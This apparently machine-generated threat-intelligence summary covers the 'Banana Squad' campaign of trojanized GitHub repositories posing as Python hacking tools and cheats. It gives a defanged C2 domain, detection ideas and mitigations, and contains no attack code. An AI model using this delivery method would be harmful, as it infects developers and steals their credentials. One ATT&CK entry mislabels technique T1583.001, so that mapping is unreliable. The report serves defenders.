Full Report
Cybersecurity researchers have uncovered a new campaign in which the threat actors have published more than 67 GitHub repositories that claim to offer Python-based hacking tools, but deliver trojanized payloads instead. The activity, codenamed Banana Squad by ReversingLabs, is assessed to be a continuation of a rogue Python campaign that was identified in 2023 as targeting the Python Package
Analysis Summary
# Tool/Technique: Trojanized GitHub Repository Payloads (Banana Squad Campaign)
## Overview
This technique involves threat actors publishing malicious code disguised as legitimate, desirable Python-based hacking tools or game cheats on public source code repositories like GitHub. The primary purpose is to lure developers, gamers, or novice cybercriminals into cloning or downloading the repositories, resulting in the execution of trojanized payloads (backdoors and stealers) on their systems. This represents a large-scale software supply chain attack vector targeting the open-source developer ecosystem.
## Technical Details
- Type: Technique (Malware Distribution/Trojanizing)
- Platform: Primarily targets developers/users running Python environments (implied Windows context from prior linked campaign reference, but GitHub code execution is platform-agnostic in theory).
- Capabilities: Delivering various backdoors, information stealers, and potentially other RATs via repository contamination.
- First Seen: The specific "Banana Squad" naming appears recent, evolving from similar rogue Python campaigns identified in 2023.
## MITRE ATT&CK Mapping
This activity spans multiple tactics, primarily focusing on initial compromise and resource development.
- **TA0001 - Initial Access**
- T1583.001 - Compromise Software Supply Chain (as the actor compromises the repository system itself)
- **TA0002 - Execution**
- T1059.006 - Command and Scripting Interpreter: Python
- **TA0011 - Command and Control**
- T1071.001 - Application Layer Protocol: Web Protocols (C2 communication)
- **TA0010 - Exfiltration**
- T1041 - Exfiltration Over C2 Channel
## Functionality
### Core Capabilities
- **Impersonation:** Creating over 67 GitHub repositories impersonating benign projects (e.g., account cleaning tools, game cheats like Discord account cleaner, Fortnite External Cheat, TikTok username checker).
- **Baiting:** Targeting users searching for tools related to gaming cheats, account checks, and hacking utilities.
- **Payload Delivery:** The repository contents are trojanized, delivering malicious code instead of the expected tool.
### Advanced Features
- **Payload Diversity (Based on linked context):** Previous related campaigns utilized payloads embedded in various components:
- Visual Studio PreBuild events (111 instances noted in a linked campaign).
- Python scripts.
- Screensaver files.
- JavaScript.
- **Staging/Secondary Payloads:** Deliverers of secondary malware, including AsyncRAT, Remcos RAT, and Lumma Stealer.
- **Data Theft:** Capabilities include stealing credentials, browser data, session tokens, and general sensitive data.
- **Remote Access:** Providing persistent remote access (RAT functionality).
## Indicators of Compromise
*Note: Specific hashes or file paths for the *current* 67 repositories are not detailed in the provided text, only the overall scope and a single associated external C2.*
- File Hashes: [Not explicitly provided for the new 67 repos]
- File Names: [Varies based on the decoy tool name]
- Registry Keys: [Not specified]
- Network Indicators: **dieserbenni[.]ru** (Associated C2 from a previously reported, similar tool).
- Behavioral Indicators: Compilation failing or executing unexpected commands upon building/running the "tool"; unexpected network connections emanating from development processes.
## Associated Threat Actors
- **Banana Squad:** Codename given by ReversingLabs for this specific wave of activity.
- **Unspecified Actors:** The activity is part of a trend involving sophisticated supply chain attacks exploiting GitHub (also linked to Water Curse, Stargazers Ghost Network operators, and actors leveraging DaaS).
## Detection Methods
- Signature-based detection: Likely signature-based detection on the known secondary payloads (AsyncRAT, Remcos RAT, Lumma Stealer) once they are executed.
- Behavioral detection: Monitoring for unusual process execution originating from development environments (e.g., Python scripts executing shell commands or network connections initiated by build processes like Visual Studio PreBuild events).
- YARA rules: Potential for YARA rules targeting known malicious components or obfuscation patterns within Python files in the repository structure.
## Mitigation Strategies
- Prevention steps emphasized by researchers: Developers must **double-check** that the repository they are using actually contains what it claims to.
- **Source Verification:** Always verify the provenance of open-source code, especially for tools promising cheats or powerful utilities.
- **Dependency Scanning:** Implement robust software composition analysis (SCA) tools to audit dependencies pulled from untrusted or newly cloned repositories.
- **Least Privilege:** Ensure development environments execute code under the least privilege necessary to prevent initial stage malware from escalating privileges or accessing sensitive data.
## Related Tools/Techniques
- Rogue Python campaigns targeting the PyPI repository (mentioned as the predecessor).
- **Stargazers Ghost Network:** Threat actors using fake popularity/scamming techniques on GitHub to promote malicious repositories.
- Sakura-RAT repository infections (delivering AsyncRAT, Remcos RAT, Lumma Stealer).
- **Distribution-as-a-Service (DaaS) Operations:** Large-scale operations utilizing compromised GitHub accounts to distribute malware embedded in trojanized repositories.